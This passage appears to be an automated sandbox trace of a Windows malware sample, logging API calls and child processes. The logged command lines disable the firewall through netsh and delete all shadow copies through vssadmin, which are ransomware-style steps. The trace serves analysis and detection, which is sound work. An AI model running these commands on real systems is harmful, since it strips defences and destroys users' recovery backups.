mode=disable") returned 1 [0154.006] GetProcessHeap () returned 0x1eeca2b0000 [0154.006] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c9510) returned 1 [0154.006] InitializeProcThreadAttributeList (in: lpAttributeList=0x58b38feec0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x58b38fedb0 | out: lpAttributeList=0x58b38feec0, lpSize=0x58b38fedb0) returned 1 [0154.006] UpdateProcThreadAttribute (in: lpAttributeList=0x58b38feec0, dwFlags=0x0, Attribute=0x60001, lpValue=0x58b38fed9c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x58b38feec0, lpPreviousValue=0x0) returned 1 [0154.006] GetStartupInfoW (in: lpStartupInfo=0x58b38fee50 | out: lpStartupInfo=0x58b38fee50*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x264, hStdOutput=0x274, hStdError=0x274)) [0154.006] GetProcessHeap () returned 0x1eeca2b0000 [0154.006] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x20) returned 0x1eeca2c9330 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.006] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0154.007] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0154.007] GetProcessHeap () returned 0x1eeca2b0000 [0154.007] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c9330) returned 1 [0154.007] GetProcessHeap () returned 0x1eeca2b0000 [0154.007] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x12) returned 0x1eeca2c9330 [0154.007] _get_osfhandle (_FileHandle=1) returned 0x274 [0154.007] SetConsoleMode (hConsoleHandle=0x274, dwMode=0x0) returned 0 [0154.007] _get_osfhandle (_FileHandle=0) returned 0x264 [0154.007] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0154.008] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\netsh.exe", lpCommandLine="netsh firewall set opmode mode=disable", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x58b38fede0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh firewall set opmode mode=disable", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x58b38fedb8 | out: lpCommandLine="netsh firewall set opmode mode=disable", lpProcessInformation=0x58b38fedb8*(hProcess=0x94, hThread=0x98, dwProcessId=0x580, dwThreadId=0x584)) returned 1 [0154.017] CloseHandle (hObject=0x98) returned 1 [0154.017] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0154.018] GetProcessHeap () returned 0x1eeca2b0000 [0154.018] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2cb5e0) returned 1 [0154.018] GetEnvironmentStringsW () returned 0x1eeca2b5930* [0154.018] GetProcessHeap () returned 0x1eeca2b0000 [0154.018] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xaea) returned 0x1eeca2caae0 [0154.018] FreeEnvironmentStringsA (penv="=") returned 1 [0154.018] NtQueryInformationProcess (in: ProcessHandle=0x94, ProcessInformationClass=0x0, ProcessInformation=0x58b38fe2b8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x58b38fe2b8, ReturnLength=0x0) returned 0x0 [0154.018] ReadProcessMemory (in: hProcess=0x94, lpBaseAddress=0x81df6b5000, lpBuffer=0x58b38fe2f0, nSize=0x7a0, lpNumberOfBytesRead=0x58b38fe2b0 | out: lpBuffer=0x58b38fe2f0*, lpNumberOfBytesRead=0x58b38fe2b0*=0x7a0) returned 1 [0154.018] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) Thread: id = 97 os_tid = 0xf80 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x377e3000" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xf30" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0xf54 Thread: id = 91 os_tid = 0xf64 Thread: id = 93 os_tid = 0xf6c Thread: id = 96 os_tid = 0xf7c Thread: id = 98 os_tid = 0xf84 Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2d6f3000" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xf38" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 89 os_tid = 0xf5c Thread: id = 90 os_tid = 0xf60 Thread: id = 92 os_tid = 0xf68 Thread: id = 94 os_tid = 0xf70 Thread: id = 95 os_tid = 0xf74 Process: id = "17" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x2b300000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xf30" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 100 os_tid = 0xf90 Thread: id = 101 os_tid = 0xf94 Thread: id = 104 os_tid = 0xfa4 Thread: id = 105 os_tid = 0xfa8 Thread: id = 106 os_tid = 0xfac Process: id = "18" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x2b372000" os_pid = "0xf98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xf38" cmd_line = "netsh advfirewall set currentprofile state off" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 102 os_tid = 0xf9c [0136.278] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff73dc80000 [0136.278] __set_app_type (_Type=0x1) [0136.278] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff73dc8a1c0) returned 0x0 [0136.278] __wgetmainargs (in: _Argc=0x7ff73dc97668, _Argv=0x7ff73dc97670, _Env=0x7ff73dc97678, _DoWildCard=0, _StartInfo=0x7ff73dc97684 | out: _Argc=0x7ff73dc97668, _Argv=0x7ff73dc97670, _Env=0x7ff73dc97678) returned 0 [0136.279] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.279] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff73dc80000 [0136.279] _vsnwprintf (in: _Buffer=0x7ff73dc99b00, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x3e092f7878 | out: _Buffer="netsh>") returned 6 [0136.279] GetProcessHeap () returned 0x1cff6a50000 [0136.279] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eb80 [0136.279] GetProcessHeap () returned 0x1cff6a50000 [0136.279] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e540 [0136.279] GetProcessHeap () returned 0x1cff6a50000 [0136.279] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e900 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e560 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eba0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e580 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ebc0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e8e0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eb60 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e5e0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e820 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eac0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ec40 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e8a0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eb00 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e5a0 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e700 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.280] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e960 [0136.280] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e8c0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eb40 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e740 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e520 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e780 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ebe0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e640 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eb20 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e880 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ec00 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eae0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e7a0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e860 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e940 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e9a0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ec20 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e4c0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e920 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e600 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e4e0 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e620 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.281] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e980 [0136.281] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e500 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e660 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e9c0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e5c0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e9e0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e680 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e6a0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ea00 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ea20 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e7c0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ea40 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e6c0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e840 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e720 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e760 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ea60 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5eaa0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ea80 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e6e0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e7e0 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5e800 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fd00 [0136.282] GetProcessHeap () returned 0x1cff6a50000 [0136.282] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a600e0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fce0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fe80 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60440 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a600a0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a602c0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fd40 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60360 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60320 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a603e0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a603a0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ff80 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fe60 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fda0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ffa0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ffc0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60400 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60000 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60240 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a601e0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60200 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60040 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.283] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fea0 [0136.283] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a602a0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fec0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] 